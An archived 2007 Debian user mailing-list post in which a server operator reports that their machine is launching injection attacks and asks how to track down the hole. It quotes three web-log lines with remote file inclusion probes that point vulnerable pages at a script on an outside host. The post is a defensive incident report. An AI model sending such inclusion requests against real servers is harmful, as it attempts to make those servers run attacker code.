Server injection attack

To: debian-user@lists.debian.org
Subject: Server injection attack
From: rocky <rocky2winnie@gmail.com>
Date: Tue, 10 Jul 2007 01:55:54 -0000
Message-id: <[🔎] 1184032554.680540.297960@a26g2000pre.googlegroups.com>

Hey list,

Currently, we get some notice about some one is using our server doing
injection attacks against other servers.

Below are some log files they sent to us
$------------------Snap begin---------------------------$
 our.server.ip.address - - [09/Jul/2007:00:31:43 +0200] "GET
>  //.comhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7414 "-"
>  "Mozilla/5.0"
>  our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET
>  //.infohttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7415
>  "-" "Mozilla/5.0"
>  our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET
>  //.brhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7413 "-"
>  "Mozilla/5.0"
$----------------snap end---------------------------------$

Unfortunately, the person who is in charge of server maintaining is
away now and we can not get hold of him. Can any of you give me some
direction on how to track down the security hole and eliminate it
please?

Thanks a lot in advance!

Blessings,
Rocky

Reply to:

Follow-Ups:
- Re: Server injection attack
  - From: Roberto C. Sánchez <roberto@connexer.com>

Prev by Date: how to set environment variables in init.d/ scripts
Next by Date: Re: Server injection attack
Previous by thread: how to set environment variables in init.d/ scripts
Next by thread: Re: Server injection attack
Index(es):
- Date
- Thread